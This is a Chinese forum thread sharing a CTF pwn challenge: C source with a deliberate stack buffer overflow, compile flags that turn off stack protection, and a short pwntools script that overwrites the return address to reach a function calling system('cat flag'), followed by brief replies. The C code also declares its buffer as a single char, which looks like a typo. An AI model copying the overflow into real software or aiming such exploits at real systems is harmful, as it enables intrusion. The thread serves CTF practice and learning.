roger 发表于 2020-4-24 00:38:51

xuenixiang_2019_pwn_pwn2

源代码:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>


int main()
{

        char buf;
    memset(&buf,0,0x30);           
    setvbuf(stdout, 0, 2, 0);
    setvbuf(stdin, 0, 1, 0);
    printf("say something?\n");
        read(0,buf,0x100);
    printf("oh,that's so boring!\n");
        return 0;
}


void get_shell_()
{
        puts("tql~tql~tql~tql~tql~tql~tql");
        puts("this is your flag!");
        system("cat flag");
       
}

//编译时用命令:
//gcc -z execstack -fno-stack-protector -o stack1 stack1.cexp:
#encoding:utf-8
#!/upr/bin/env python
from pwn import *
p = process("./stack1")
getshell=0x400751
payload = "a"*0x38+p64(getshell)
p.send(payload)
p.interactive()

**** Hidden Message *****

zhouruijie 发表于 2020-7-20 21:43:57

第一次看这种pawn题 真心不知道怎么做

Lucky 发表于 2020-9-16 22:20:46

flag 不反汇。。

roger 发表于 2020-9-17 07:39:37

Lucky 发表于 2020-9-16 22:20
flag 不反汇。。

啥意思,flag不对吗

天象独行 发表于 2020-12-14 11:40:21

学习一下,老实说,看的有点儿懵

ZARD 发表于 2020-12-22 18:22:25

太给力了,这么多好东西!

夜未央 发表于 2021-1-5 01:44:03

dddddddddddddd

极速代码 发表于 2021-12-8 10:32:52

非常不错啊,感谢楼主无私的共享精神!
页: [1]
查看完整版本: xuenixiang_2019_pwn_pwn2